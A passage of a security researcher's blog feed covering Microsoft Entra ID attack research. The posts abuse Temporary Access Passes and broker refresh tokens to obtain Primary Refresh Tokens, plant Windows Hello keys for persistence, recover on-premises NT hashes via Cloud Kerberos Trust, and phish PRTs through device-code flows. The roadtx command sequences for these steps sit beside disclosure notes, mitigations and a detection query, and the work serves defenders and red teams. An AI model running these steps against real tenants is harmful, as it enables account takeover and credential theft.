<p>To configure Windows Hello for Business, we need to have some special tokens. This process is very similar to the flow from <a href="https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/">my last blog</a> where we used the special permissions of the Microsoft Authentication Broker to request a token that we can upgrade to a PRT. This flow is also similar to how Windows upgrades Primary Refresh Tokens to include an MFA claim after obtaining them with only a password. In this flow we don’t use the authentication method directly in the PRT request, but we use a special refresh token that acts as an intermediary.</p>

<p>Windows Hello provisioning also requires us to have a device in the tenant. Lucky for us, registering or joining devices is enables in almost all tenants, so if we do not have access to an existing device we can register or join one as part of the flow. We could technically abuse an existing device here, but that would complicate the process, especially if there is a TPM involved.</p>

<p>The first step is to authenticate using the TAP, using the <code class="language-plaintext highlighter-rouge">prtenrich</code> command from <a href="https://github.com/dirkjanm/ROADtools">roadtx</a>. This command also works without an existing PRT if we use the <code class="language-plaintext highlighter-rouge">--no-prt</code> flag, which allows us to use a TAP for authentication.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prtenrich -u hybrid@hybrid.iminyour.cloud --no-prt
</code></pre></div></div>

<p>This will prompt us for the TAP (which is now the preferred authentication method), and give us a refresh token. If we do not yet have a device certificate/key, we can also use this refresh token to register a device.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx gettokens --refresh-token &lt;token&gt; -c broker -r drs
</code></pre></div></div>

<p>We can join or register a device with the <code class="language-plaintext highlighter-rouge">device</code> module:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx device -n blogtest2 -a register
</code></pre></div></div>

<p>And with our newly registered device we can get a PRT:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prt -r &lt;refreshtoken&gt; -c blogtest2.pem -k blogtest2.key
</code></pre></div></div>

<p>The output of these commands should look somehwat like this:</p>

<p><img src="/assets/img/tap/get_device_prt.png" alt="Request a PRT" class="align-center" /></p>

<p>Unfortunately for us, this PRT is only going to be valid for as long as the TAP itself. It does not say so in the expiry time, but it will get refused after the TAP expiry:</p>

<p><img src="/assets/img/tap/tap_expired_prt.png" alt="PRT expires with the TAP" class="align-center" /></p>

<p>If we want to have actual persistence, we need to provision some additional credentials on the account. In this case, we could set up a Windows Hello key for the account, which we can then use after the TAP expires. The process to do this is very similar as in my <a href="https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/">last blog</a>. We use the <code class="language-plaintext highlighter-rouge">prtenrich</code> command again to get an access token for Windows Hello provisioning, then we register the actual hello key.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prtenrich --ngcmfa-drs-auth
roadtx winhello -k hybriduser.key
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">prtenrich</code> command should automatically proceed if we did the TAP authentication within the last 10 minutes. If not, we can just use the TAP again to comply with MFA requirements (provided the TAP was valid for multiple uses). The <code class="language-plaintext highlighter-rouge">winhello</code> command provisions the key for our user. If we want, we can use it to get a new PRT, that is valid for longer and also counts as MFA:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prt -hk hybriduser.key -c blogtest2.pem -k blogtest2.key -u hybrid@hybrid.iminyour.cloud
</code></pre></div></div>

<p>We can use this PRT with the usual <code class="language-plaintext highlighter-rouge">prtauth</code> and <code class="language-plaintext highlighter-rouge">browserprtauth</code> to either get tokens or to browse the web as our victim.</p>

<h3 id="obtaining-nt-hashes-of-the-victim-via-a-tap">Obtaining NT hashes of the victim via a TAP</h3>
<p>So far, we didn’t see anything unexpected. After all, a TAP is a legitimate way to configure passwordless credentials, such as Windows Hello keys or FIDO keys (we wouldn’t even need to use custom tools to register a FIDO key, a browser would be sufficient). But if we take a step back and look at the PRT that we received after using the TAP, we see something unexpected:</p>

<p><img src="/assets/img/tap/prt_tgt.png" alt="PRT with TGT" class="align-center" /></p>

<p>Our PRT came with a Kerberos TGT for the on-premises Active Directory that our victim is part of. This is made possible by the Cloud Kerberos Trust feature, so it only works if that has been configured in the Entra tenant and the on-prem AD. However, it is meant to make on-premises authentication possible with Windows Hello for business keys and FIDO keys, not necessarily with TAPs. The issue here is that while a TAP is by definition temporary, the TGT that we receive here is valid for 10 hours, which most likely exceeds the validity of the TAP itself. Further more, since Cloud Kerberos trust enables recovering legacy credentials (meaning NT hashes), we can obtain the NT hash of our victim, provided that we have line-of-sight to an on-premises AD Domain Controller. The NT hash can be used to request TGTs even after the TAP expired or our access in the cloud was revoked. If the original password of the user is relatively weak, we might also be able to recover the plain text password by brute forcing the NT hash with tools such as hashcat.</p>

<p>So to recap, provided we have the following:</p>

<ul>
  <li>TAPs enabled in the tenant</li>
  <li>Sufficient access to provision TAPs on our victims</li>
  <li>Cloud Kerberos trust enabled</li>
  <li>Line of sight to the on-premises AD</li>
</ul>

<p>We could obtain the NT hash for anyone we can provision a TAP for, without requiring to configure persistence on their account, and all with a single device identity to leave as few traces as possible. While this list of requirements is quite long, if you do meet all of them it could be used as a somewhat noisy hash dump method, entirely controlled from Entra. There are limits on which accounts we can target with this, so users like Domain Admins (which shouldn’t be synced to Entra in the first place) are not affected. The restrictions and details of how exactly this works are covered in my <a href="https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/">blog on Cloud Kerberos Trust</a>.</p>

<p>Let’s perform the last step of our attack. We re-use the PRT we got at the first step, so the one requested using the TAP, before we enrolled a Windows Hello key. This PRT contains a partial TGT, which we can exchange for a full TGT using <a href="https://github.com/dirkjanm/ROADtools_hybrid">ROADtools hybrid</a>’s <code class="language-plaintext highlighter-rouge">partialtofulltgt.py</code> script.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python partialtofulltgt.py -f roadtx.prt hybrid.iminyour.cloud/hybrid
</code></pre></div></div>

<p><img src="/assets/img/tap/tap_to_nt_hash.png" alt="From TAP to NT hash" class="align-center" /></p>

<p>If we want to do this for more users, we simply provision a TAP for them too, request a TGT with the TAP and then recover the NT hash. You could write a script that loops through this and recovers as many hashes as possible, without making permanent changes to the accounts or causing impact on the real user of the account.</p>

<h1 id="disclosure-prevention-and-detection">Disclosure, prevention and detection</h1>
<p>While many parts of this are following the design principles, the ability to obtain a long-term key (NT hash) with a Temporary Access Pass seemed like a vulnerable feature of the protocol to me. Microsoft did consider it a valid finding when I reported it to MSRC, but not one of immediate concern because of the high privilege requirements, and the fact that an admin in that position would also be able to compromise an on-premises account through something like password write-back if that is enabled in the tenant.</p>

<p>I agree with them that the privileged required are high, it is not a default configuration, and there are other options to abuse the privileges these roles have. However, I still think that temporary passwords should not immediately give access to long term keys. From a pentester point of view, I also find it an interesting attack since it is non-disruptive to the actual user, which during a red team or pentest engagement is a big advantage. Since this feature will not be addressed in the immediate future, it is something that could be abused by attackers in the lateral movement / post exploitation stage of their attacks.</p>

<p>My recommendations if you have a setup where these features are present would be as follows:</p>

<ul>
  <li>Avoid syncing accounts that have privileged rights in Active Directory to Entra ID.</li>
  <li>Make sure to scope the Temporary Access Pass authentication method only to regular users, and not to admin accounts that may be synced from on-premises (even though I just told you not to do that).</li>
  <li>Monitor for assignments of Temporary Access Passes on sensitive accounts, especially in high volume.</li>
  <li>Monitor for large numbers of users signing in “from” the same device, which is the event that is generated when a PRT is issued.</li>
  <li>Require compliant or hybrid joined devices for sign-in to prevent fake devices that are registered by attackers from being used to access applications.</li>
</ul>

<p>As usual, ROADtools is available via <a href="https://github.com/dirkjanm/ROADtools">GitHub</a> or via PyPI via <code class="language-plaintext highlighter-rouge">pip install roadtx</code>. <a href="https://github.com/dirkjanm/ROADtools_hybrid">ROADtools hybrid</a> is available as a collection of standalone scripts on GitHub.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[Temporary Access Passes are a method for Microsoft Entra ID (formerly Azure AD) administrators to configure a temporary password for user accounts, which will also satisfy Multi Factor Authentication controls. They can be a useful tool in setting up passwordless authentication methods such as FIDO keys and Windows Hello. In this blog, we take a closer look at the options attackers have to abuse Temporary Access Passes for lateral movement, showing how they can be used for passwordless persistence and even to recover on-premises Active Directory passwords in certain hybrid configurations.]]></summary></entry><entry><title type="html">Phishing for Primary Refresh Tokens and Windows Hello keys</title><link href="https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/" rel="alternate" type="text/html" title="Phishing for Primary Refresh Tokens and Windows Hello keys" /><published>2023-10-10T16:08:57+00:00</published><updated>2023-10-10T16:08:57+00:00</updated><id>https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens</id><content type="html" xml:base="https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/"><![CDATA[<p>In Microsoft Entra ID (formerly Azure AD, in this blog referred to as “Azure AD”), there are different types of OAuth tokens. The most powerful token is a Primary Refresh Token, which is linked to a user’s device and can be used to sign in to any Entra ID connected application and web site. In phishing scenarios, especially those that abuse legit OAuth flows such as device code phishing, the resulting tokens are often less powerful tokens that are limited in scope or usage methods. In this blog, I will describe new techniques to phish directly for Primary Refresh Tokens, and in some scenarios also deploy passwordless credentials that comply with even the strictest MFA policies.</p>

<h1 id="tokens-and-limitations">Tokens and limitations</h1>
<p>Just to have a short recap, there are different token types in Azure AD that each have their own limitations:</p>

<ul>
  <li><strong>Access tokens</strong>, which can be used to talk to APIs and access resources, for example over the Microsoft Graph. They are tied to a specific client (the application that requested them), and a specific resource (the API that you are accessing).</li>
  <li><strong>Refresh tokens</strong>, which are issued to applications to obtain new access tokens, since access tokens have a relatively short lifetime. They can only be used by the application they were issued to, or in some cases by a group of applications.</li>
  <li><strong>Primary Refresh Tokens</strong>, which are used for Single Sign On on devices that are Azure AD joined, registered or hybrid joined. They can be used both in browser sign-in flows to web applications and for signing in to mobile and desktop applications running on the device. I have covered Primary Refresh Tokens (PRT) <a href="https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/">single sign on</a>, <a href="https://dirkjanm.io/digging-further-into-the-primary-refresh-token/">stealing</a>, <a href="https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/">abuse</a> and <a href="https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/">lateral movement</a> extensively in many of my blogs and <a href="https://dirkjanm.io/talks/">talks</a>.</li>
</ul>

<p>Access tokens are the only tokens that can be used to access data, (Primary) Refresh tokens can be used to request an access token, but cannot be used directly to talk to services that use Azure AD for authentication. The security of these tokens also requires that you can not use an access token to obtain a refresh token, since that would allow you “upgrade” your token to a more powerful token than you had initially.</p>

<p>The requirement to obtain a Primary Refresh Token is that you need to start with a device identity, and then use the users credentials to request a PRT. This limits how these powerful tokens can be issued and makes it harder for attackers to obtain them.</p>

<h2 id="the-exception-to-the-rule---special-refresh-tokens">The exception to the rule - special refresh tokens</h2>
<p>A while ago I was researching Windows Hello for Business (WHFB) and I spent quite a few times resetting my test systems to analyze the process. During this research I observed some interesting behaviour. If one sets up a new Windows installation, usually it is only needed to authenticate once during the setup process, and that one authentication is used to complete the entire setup flow and also set up WHFB keys. This is interesting, since at the moment we start the setup the device is not yet joined or registered in Azure AD. At the end however, we have a PRT that is used for SSO, and even meets the requirements to provision WHFB keys (which always requires a device identity used through a PRT).</p>

<p>Through analyzing the token flows used during the Windows setup, I found out that the process starts by signing in to a specific application, which gives Windows an access token and a refresh token. The access tokens can be used to join the device to Azure AD and set up the device identity. After the device registration, the refresh token which was issued without a device, is used with the new device identity to request a Primary Refresh Token. To me this is quite a clear violation of the token security architecture. We can use a regular refresh token, that is not tied to a device but is tied to a specific app, to first register a device and then request a more powerful token that can be used in any sign-in scenario.</p>

<h1 id="technical-details">Technical details</h1>
<p>The “upgrade” from normal refresh token to primary refresh token is not possible with every refresh token. It requires a specific application ID (client ID) in the sign-in flow. Windows uses the client ID <code class="language-plaintext highlighter-rouge">29d9ed98-a469-4536-ade2-f981bc1d605e</code> (Microsoft Authentication Broker) and resource <code class="language-plaintext highlighter-rouge">https://enrollment.manage.microsoft.com/</code> for this request. We can emulate this flow with the roadtx <code class="language-plaintext highlighter-rouge">gettokens</code> command, which supports several different authentication flows:</p>

<p><img src="/assets/img/devicecode/gettokens-broker.png" alt="Getting a token" class="align-center" /></p>

<p>If there is a policy that requires MFA to sign in, we can instead use the <code class="language-plaintext highlighter-rouge">interactiveauth</code> module:</p>

<p><img src="/assets/img/devicecode/gettokens-interactive.png" alt="Getting a token interactively" class="align-center" /></p>

<p>The resulting refresh token (which is cached in the <code class="language-plaintext highlighter-rouge">.roadtools_auth</code> file) can be used to request a token for the device registration service, where we can create the device:</p>

<p><img src="/assets/img/devicecode/regdevice.png" alt="Creating the device" class="align-center" /></p>

<p>Now that we have a device identity, we can combine this with the same refresh token to obtain a PRT (both refresh tokens shortened for readability):</p>

<p><img src="/assets/img/devicecode/tech-getprt.png" alt="Obtaining a refresh token" class="align-center" /></p>

<p>Tokens resulting from the authentication will contain the same authentication method claims as used during the registration, so any MFA usage will be transferred to the PRT. The PRT that we get can be used in any authentication flow, so we can expand the scope of our limited refresh token to any possible app.</p>

<p><img src="/assets/img/devicecode/prtauth.png" alt="Using the PRT to get a token for Teams" class="align-center" /></p>

<p>We can also use this to sign in to browser flows:</p>

<p><img src="/assets/img/devicecode/prt-browser.png" alt="Using the PRT to sign in to web sites in the browser" class="align-center" /></p>

<h2 id="provisioning-windows-hello-for-business-keys">Provisioning Windows Hello for Business keys</h2>
<p>If you set up Windows and WHFB is enabled for your device, it will use the same session to provision the WHFB key for the newly set up device. To do this, we will need an access token with the <code class="language-plaintext highlighter-rouge">ngcmfa</code> claim. As long as we did the MFA authentication within the last 10 minutes, the PRT from the previous step is all we need. We can ask Azure AD to give us a token for the device registration service that contains this claim, without requiring further user interaction. To do this, we use the <code class="language-plaintext highlighter-rouge">prtenrich</code> command from roadtx, which will ask for this token.</p>

<p><img src="/assets/img/devicecode/ngcmfa.png" alt="Asking for a token with ngcmfa claim to register WHFB keys" class="align-center" /></p>

<p>With this new access token, we can provision the new WHFB key. This key can be used to also request new PRTs in the future, without needing access to the users password.</p>

<p><img src="/assets/img/devicecode/winhello.png" alt="Provisioning the WHFB key" class="align-center" /></p>

<p><img src="/assets/img/devicecode/helloauth.png" alt="Using the WHFB key" class="align-center" /></p>

<h1 id="phishing-for-primary-refresh-tokens">Phishing for Primary Refresh Tokens</h1>
<p>Now that we know how the process works, we can change the approach to make it usable for phishing. Phishing PRTs directly is not possible, since this requires an existing device identity to be used during the flow. We cannot trick users or their endpoints in sending us the required information to directly request a PRT. We can however use several methods to ask for a regular refresh token with the right client and resource, to then use that to register a device and ask for a PRT.</p>

<h2 id="device-code-phishing">Device code phishing</h2>
<p>In the authentication step above, we used a username and password to authenticate. However, we can also use the device code flow for this. While Windows does not use this flow for the registration/join process, it is a valid OAuth flow which will give us the same refresh token.</p>

<p><img src="/assets/img/devicecode/devicecode-broker.png" alt="Device code sign in" class="align-center" /></p>

<p>As you can see, the device code flow asks users to enter a code on their own device and complete the authentication, which will provide the tokens on the device it was initiated. This flow is also suitable for phishing, because if we can convince our victim to perform the authentication with a device code, we will obtain tokens on their behalf. This is not a new technique, but has been described by several people in the past. There are also several tool kits that make the whole process easier. If you want to read up on this technique, here are some references:</p>

<ul>
  <li><a href="https://aadinternals.com/post/phishing/">https://aadinternals.com/post/phishing/</a></li>
  <li><a href="https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html">https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html</a></li>
  <li><a href="https://github.com/secureworks/squarephish">https://github.com/secureworks/squarephish</a></li>
  <li><a href="https://www.blackhillsinfosec.com/dynamic-device-code-phishing/">https://www.blackhillsinfosec.com/dynamic-device-code-phishing/</a></li>
</ul>

<p>So let us assume we convince a user to authenticate, and we receive the refresh token. We can now use this refresh token to:</p>

<ul>
  <li>Register or join a device to Azure AD if we don’t already have access to a device in the tenant.</li>
  <li>Use the refresh token to ask for a PRT.</li>
  <li>If the user performed “fresh” MFA when authenticating with the device code flow, we can also register WHFB credentials on their account for persistence.</li>
</ul>

<p>There are a few caveats to this, which you have to take into account if you are performing this attack:</p>

<ul>
  <li>The device code is only valid for 15 minutes after you initiate the device code flow, which adds extra restrictions if you want to use this for phishing. Some tools account for this by only creating the device code once the user interacts with the email, for example via a QR code.</li>
  <li>Registering or joining devices could be restricted in the tenant to only specific users. In general, joining devices is restricted more often than registering them. Unless there are specific policies that require a certain device status, there won’t be a practical difference in the usability of the token.</li>
  <li>Registering WHFB credentials is only possible if the user actively performed MFA when using the device code. If they use the device code from an existing session their managed device, the MFA claim will be passed on to the refresh token and is most likely not recent enough to provision a WHFB key. In my testing, the cached sign-in status will only be used if the user has an existing session on an unmanaged device, and on browsers that signed in using SSO it will not automatically use the cached login.</li>
</ul>

<p>The video below shows the attack as a proof of concept. In practical scenarios, you could use your preferred device code phishing framework or method to do the phishing part.</p>

<video width="100%" controls="">
    <source src="/assets/raw/prtphish.mp4" type="video/mp4" />
</video>

<p>The video above uses the <a href="https://github.com/kiwids0220/deviceCode2WinHello">deviceCode2WinHello</a> script that automates all these steps, written by <a href="https://twitter.com/mhskai2017">Kai</a> from SpecterOps (see conclusions at the end of the blog). It also uses the <code class="language-plaintext highlighter-rouge">roadtx keepassauth</code> module to do the authentication, in reality you would have to convince your victim to do the authentication, but this was easier for the demonstration.</p>

<h2 id="credential-phishing">Credential phishing</h2>
<p>It is also possible to perform the phishing attack using credential phishing methods, for example with evilginx as framework. If we use a Microsoft 365 phishlet to sign in, for example <a href="https://github.com/BakkerJan/evilginx3/blob/main/microsoft365.yaml">this one</a> by Jan Bakker, we will obtain the session cookies for the victim. These session cookies can be used with roadtx to ask for the correct tokens, and from there on the attack is the same:</p>

<p><img src="/assets/img/devicecode/estscookie.png" alt="Signing in with captured cookie" class="align-center" /></p>

<p>I talked more about this approach at AREA41 in June 2024, the slides, recording and a demo video are available on the <a href="/talks/">talks</a> page.</p>

<h1 id="prevention-and-detection">Prevention and detection</h1>
<p>There are not many ways to prevent these attacks. Device code phishing is one of the few methods that is not prevented by requiring a certain MFA strength, since users perform this authentication against the legit Microsoft domains. In addition, there is unfortunately no way to block certain OAuth flows such as the device code flow. The credential phishing approach described above is easier to prevent, since this will happen on a fake website which will prevent some MFA methods from working.</p>

<p>The only real effective way to block this attack is to require a device to be managed via MDM or MAM, by having a Conditional Access policy in place that requires a compliant or hybrid joined device. Complying with this policy would require the newly registered device to also be enrolled in Intune. Provided Intune is locked down sufficiently to block people from enrolling non-corporate or fake devices, our newly registered device won’t be able to become compliant and meet the requirements of these policies. Note that the device registration flow itself is not blocked by policies requiring compliant devices, since this flow is by definition excluded from these policies (you cannot already have a compliant device during device registration). So, if policies are in place that require a compliant or hybrid joined device, it is still possible to obtain a PRT. The PRT can however not be used to authenticate or to enroll the WHFB keys since that would require the device to be compliant or hybrid joined.</p>

<p>Detection of this technique is fortunately easier. Windows will not use the Device Code flow to register or join itself to Azure AD, but it will interactively prompt the user to authenticate. Since the authentication flow is shown in the Sign-in logs, it is quite easy to write detection queries based on the app ID and the authentication flow. An example KQL query would look something like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SigninLogs 
| where AppId == "29d9ed98-a469-4536-ade2-f981bc1d605e" //Broker app client id
    and AuthenticationProtocol == "deviceCode"
</code></pre></div></div>

<p>During my discussions with Microsoft on this topic, I was informed that in some cases the device code flow is used legitimately by the broker application, so this query could yield some false positives. If you find some legit matches with this query, feel free to reach out so we can see if it is possible to fine-tune it to exclude legitimate cases.</p>

<h1 id="disclosure-process">Disclosure process</h1>
<p>I reported this issue to Microsoft a few months ago, since the ability to upgrade tokens violates the restrictions that should be in place on refresh tokens. While Microsoft acknowledged the issue, they did not consider this worth fixing immediately because of the requirement to phish users to authenticate. This means that this is something that red teams could use on future engagements until there are new mitigations for this technique, and that defenders should be aware of the abuse potential of these authentication flows.</p>

<p>Microsoft did indicate that they are working on new features to mitigate this issues. The mitigations they are considering are as follows:</p>

<ul>
  <li>Adding additional warnings to the device code flow screen if it is used to authenticate to the broker client, warning the user that this will allow the application to perform Single Sign On on their behalf.</li>
  <li>Adding additional features to Conditional Access that offer more control over when the device code flow is permitted, offering the possibility to restrict or block the device code flow for certain applications or locations, similar to other Conditional Access features.</li>
</ul>

<h1 id="conclusion-and-tools">Conclusion and tools</h1>
<p>Due to the ability to upgrade some refresh tokens to Primary Refresh Tokens, attackers have more ways to phish users and compromise accounts. This uses normal token flows that are already available in tool such as the ROADtools Token eXchange toolkit (roadtx), available via <a href="https://github.com/dirkjanm/ROADtools">GitHub</a>.</p>

<p>While working on this blog, I was having a chat with <a href="https://twitter.com/mhskai2017">Kai</a>, who was one of the people in my Azure AD training a few weeks prior. He also figured out the same upgrade technique independently, and wrote a <a href="https://github.com/kiwids0220/deviceCode2WinHello">script</a> that performs the steps via a single command.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[In Microsoft Entra ID (formerly Azure AD, in this blog referred to as “Azure AD”), there are different types of OAuth tokens. The most powerful token is a Primary Refresh Token, which is linked to a user’s device and can be used to sign in to any Entra ID connected application and web site. In phishing scenarios, especially those that abuse legit OAuth flows such as device code phishing, the resulting tokens are often less powerful tokens that are limited in scope or usage methods. In this blog, I will describe new techniques to phish directly for Primary Refresh Tokens, and in some scenarios also deploy passwordless credentials that comply with even the strictest MFA policies.]]></summary></entry><entry><title type="html">Obtaining Domain Admin from Azure AD by abusing Cloud Kerberos Trust</title><link href="https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/" rel="alternate" type="text/html" title="Obtaining Domain Admin from Azure AD by abusing Cloud Kerberos Trust" /><published>2023-06-13T11:08:57+00:00</published><updated>2023-06-13T11:08:57+00:00</updated><id>https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust</id><content type="html" xml:base="https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/"><![CDATA[<p>Many modern enterprises operate in a hybrid environment, where Active Directory is used together with Azure Active Directory. In most cases, identities will be synchronized from the on-premises Active Directory to Azure AD, and the on-premises AD remains authoritative. Because of this integration, it is often possible to move laterally towards Azure AD when the on-premises AD is compromised. Moving laterally from Azure AD to the on-prem AD is less common, as most of the information usually flows from on-premises to the cloud. The Cloud Kerberos Trust model is an exception here, since it creates a trust from the on-premises Active Directory towards Azure AD, and thus it trusts information <em>from</em> Azure AD to perform authentication. In this blog we will look at how this trust can be abused by an attacker that obtains Global Admin in Azure AD, to elevate their privileges to Domain Admin in environments that have the Cloud Kerberos Trust set up. Since this technique is a consequence of the design of this trust type, the blog will also highlight detection and prevention measures admins can implement.</p>

<h1 id="attack-model">Attack model</h1>
<p>Most attacks in hybrid environments exist of moving laterally from Active Directory towards Azure AD, since the source of identities is the on-premises Active Directory from where the identities are synced to Azure AD. As a result, a compromised Active Directory can almost always result in a compromised Azure AD. I have covered several of these attack paths in the past, during various talks and blogs:</p>

<ul>
  <li>Overwriting Azure AD admin credentials <a href="https://blog.fox-it.com/2019/06/06/syncing-yourself-to-global-administrator-in-azure-active-directory/">via a sync bug</a></li>
  <li>Adding additional credentials to service principals <a href="https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/">via the Azure AD connect sync account</a></li>
  <li>Abusing Seamless Single Sign-on to impersonate identities in the cloud <a href="https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf">via Kerberos</a></li>
</ul>

<p>Attacks from Azure AD to on-prem AD are much rarer, since in many cases AD does not sync much information from Azure AD and the writeback functions that exist use the permission model of Active Directory to prevent changing information of Tier 0 resources such as Domain Admins. The Cloud Kerberos Trust feature is an exception on this, since it creates a Read Only Domain Controller (RODC) in AD and stores its credentials in Azure AD. This effectively gives Azure AD highly privileged keys that it can use to authenticate most accounts in Active Directory. While we can’t extract these keys from Azure AD, not even with Global Admin, there are some other attack paths that we can abuse to achieve Domain Admin in Active Directory. This attack path assumes the following starting prerequisites:</p>

<ul>
  <li>The attacker has obtained Global Admin privileges in Azure AD.</li>
  <li>The attacker has network connectivity to at least one Domain Controller of the on-premises Active Directory.</li>
  <li>The Cloud Kerberos Trust feature is set up and working properly.</li>
</ul>

<p>The network connectivity part makes this not an attack that can be done from a fully external perspective, but if there is any VPN between Azure hosted resources and an on-premises domain, or a VPN configuration is rolled out via Intune, this should not be too hard to obtain. This is also a valid attack if an attacker is in an Active Directory network and has obtained Global Admin privileges but not yet Domain Admin privileges for some reason.</p>

<h1 id="the-cloud-kerberos-trust">The Cloud Kerberos Trust</h1>
<p>Cloud Kerberos Trust was added as a method to enable signing in to Active Directory connected resources with accounts that use a passwordless authentication method. Like the name implies, passwordless methods do not involve a password, so it is not possible for Windows to calculate an NT hash or Kerberos keys for the account. Since Active Directory does not have a native implementation for things such as FIDO2 keys, a trust with Azure AD is established and Azure AD is given a set of keys that it can use to issue Kerberos tickets for Active Directory. The setup is usually performed with a PowerShell script that creates a Read Only Domain Controller (RODC) in AD. This RODC does not really exist as a Windows server in Active Directory, but instead is more like a virtual account that is purely used to establish this trust. The RODC consists of two important components:</p>

<ul>
  <li>The RODC computer account, named <code class="language-plaintext highlighter-rouge">AzureADKerberos$</code>. The presence of this account is also a good indicator that Cloud Kerberos is in use in the domain.</li>
  <li>A secondary <code class="language-plaintext highlighter-rouge">krbtgt</code> account named <code class="language-plaintext highlighter-rouge">krbtgt_AzureAD</code>. This account contains the Kerberos keys used for tickets that Azure AD creates. The SAM account name of this account will include the key ID, for example <code class="language-plaintext highlighter-rouge">krbtgt_9898</code>.</li>
</ul>

<p>The RODC computer account and its secondary krbtgt account are linked together through the <code class="language-plaintext highlighter-rouge">msDS-KrbTgtLinkBl</code> attribute. This is important because an RODC comes with a set of restrictions which are set on the RODC computer account, but also apply to any tickets issued by the secondary krbtgt. As such, while Azure AD could technically issue tickets for users with administrator privileges, such as Domain Admins, these tickets will be refused by the AD domain controllers because the RODC is not allowed to issue tickets for them. This is managed in the attributes <code class="language-plaintext highlighter-rouge">msDS-RevealOnDemandGroup</code> and <code class="language-plaintext highlighter-rouge">msDS-NeverRevealGroup</code>, which are summarized in the GUI as the “Password Replication Policy”:</p>

<p><img src="/assets/img/cloudkerberos/rodcaccount.png" alt="Password Replication allowed and denied group list" class="align-center" /></p>

<p>We see that since “Domain Users” is in the default scope, any user in the domain, excluding the users that are in any group explicitly denied, can be authenticated from Azure AD. While this includes most default high-privilege groups, in a real domain there will likely be more users with equivalent privileges that are not in any of those groups, so these will be our targets later on.</p>

<h2 id="how-azure-ad-issues-kerberos-tickets">How Azure AD issues Kerberos tickets</h2>
<p>If a Cloud Kerberos Trust is set up, Azure AD will issue partial Kerberos tickets when a user authenticates on Windows using a hybrid identity. This process occurs at the same time a Primary Refresh Token (PRT) is requested. Windows indicates it wants a TGT with the parameter <code class="language-plaintext highlighter-rouge">tgt=true</code> in the request. The request itself is a signed JWT that contains the users credentials or a Windows Hello assertion to authenticate. I’ve talked about the content of this request several times, for example in my <a href="https://dirkjanm.io/assets/raw/TR22_Mollema_Breaking_Azure_AD_joined_endpoints_in_zero-trust_environments_v1.0.pdf">TROOPERS</a> talk from last year, and some more this year at <a href="https://dirkjanm.io/assets/raw/Insomnihack%20Breaking%20and%20fixing%20Azure%20AD%20device%20identity%20security.pdf">Insomnihack</a>. The important part here is the <code class="language-plaintext highlighter-rouge">tgt</code> parameter, which will cause Azure AD to include at least a cloud TGT that can be used for Azure AD Kerberos (mostly relevant when you use Azure AD connected fileshares over SMB), and if configured also a TGT for AD:</p>

<p><img src="/assets/img/cloudkerberos/tgt_req.png" alt="TGT in PRT request" class="align-center" /></p>

<p>The response will have the <code class="language-plaintext highlighter-rouge">tgt_cloud</code> and if configured and applicable to the account we authenticate with also the <code class="language-plaintext highlighter-rouge">tgt_ad</code> parameter:</p>

<p><img src="/assets/img/cloudkerberos/tgt_resp.png" alt="TGT in PRT response" class="align-center" /></p>

<p>The <code class="language-plaintext highlighter-rouge">clientKey</code> parameter is the TGT session key, sent encrypted in JWE (JSON web encryption) format. Windows will first decrypt the session key of the PRT using the transport key of the device. Once it has the PRT session key, it can use that to decrypt the TGT session key. We call this a partial TGT because unlike a regular TGT, this does not include all the information of the user, simply because Azure AD does not have the full list of attributes or groups from the user account. The result is a TGT with a <a href="https://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/">PAC</a> that contains only the base attributes such as the user security identifier (SID) and their name. Windows can exchange this partial TGT for a full TGT by requesting a service ticket for the <code class="language-plaintext highlighter-rouge">krbtgt</code> service. The <code class="language-plaintext highlighter-rouge">krbtgt</code> service is normally used during the initial TGT request operation, but it can also be used in this flow to request a full TGT. The request is sent in a TGS-REQ message to a Domain Controller:</p>

<p><img src="/assets/img/cloudkerberos/tgsreq.png" alt="TGS-REQ exchanging the partial TGT for a full TGT" class="align-center" /></p>

<p>The Domain Controller will reply with a TGS-REP message containing a new TGT, now including a full PAC with all the users attributes and group memberships. This TGT is encrypted with the primary <code class="language-plaintext highlighter-rouge">krbtgt</code> keys of the domain, and can be used to request service tickets for services accepting Kerberos authentication.</p>

<h2 id="ntlm-authentication">NTLM Authentication</h2>
